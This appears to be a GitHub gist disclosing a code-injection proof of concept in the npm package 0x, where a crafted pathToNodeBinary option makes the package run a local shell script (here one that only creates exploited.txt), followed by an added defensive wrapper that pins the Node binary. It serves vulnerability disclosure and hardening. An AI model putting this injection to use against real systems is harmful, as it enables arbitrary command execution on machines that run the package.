@mcoimbra
Last active October 29, 2023 12:21
Package 0x: Affected versions of this package are vulnerable to code injection. Calling zeroEks(args) executes the local file named in pathToNodeBinary, here local-touch.sh (via lib/v8-log-to-ticks.js#74), which may run arbitrary commands. This requires additional files to be present; they can be empty.
const zeroEks = require('0x');
var args = {
  pathToNodeBinary: "./local-touch.sh",
  visualizeOnly: "./",
  v: true
}
/*
 * For this to work, the following files with specific names must be present
 * to pass through certain regex points in the 0x package execution flow:
 * - isolate-0xaBDcEEd-5671283554685763082363172-133712419908-v8.log
 * - statcks.5.out
 * This example will call 'local-touch.sh' which will have been created beforehand.
 * A local 'exploited.txt' file will be created.
 */
zeroEks(args)

#!/bin/bash
touch "exploited.txt"
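A defensive wrapper for callers that build 0x options from input they do not fully control, added here as an example (not code from this gist or from the 0x project). `hardenZeroExArgs` and its key allowlist are hypothetical names, and the sketch assumes the only binary 0x should ever execute is the Node.js executable running the current process.

```javascript
const fs = require('fs');
const path = require('path');

// Assumption of this example: the only binary 0x may be pointed at is the
// Node.js executable running this process.
const TRUSTED_NODE = fs.realpathSync(process.execPath);

// Keys forwarded from caller input; everything else is dropped. These are the
// keys used in the PoC above; extend the list deliberately, never by default.
const FORWARDED_KEYS = ['visualizeOnly', 'v'];

function hardenZeroExArgs(untrusted) {
  const safe = {};
  for (const key of FORWARDED_KEYS) {
    if (Object.prototype.hasOwnProperty.call(untrusted, key)) safe[key] = untrusted[key];
  }
  if (untrusted.pathToNodeBinary !== undefined) {
    let resolved;
    try {
      // realpath follows symlinks, so a link named "node" that points elsewhere is caught.
      resolved = fs.realpathSync(path.resolve(String(untrusted.pathToNodeBinary)));
    } catch (err) {
      throw new Error('pathToNodeBinary does not resolve to an existing file');
    }
    if (resolved !== TRUSTED_NODE) {
      throw new Error(`refusing to let 0x execute ${resolved}`);
    }
  }
  // Pin the value explicitly instead of relying on the package default.
  safe.pathToNodeBinary = TRUSTED_NODE;
  return safe;
}
```

Call it as `zeroEks(hardenZeroExArgs(args))`; with the args from the PoC above it throws before 0x is invoked.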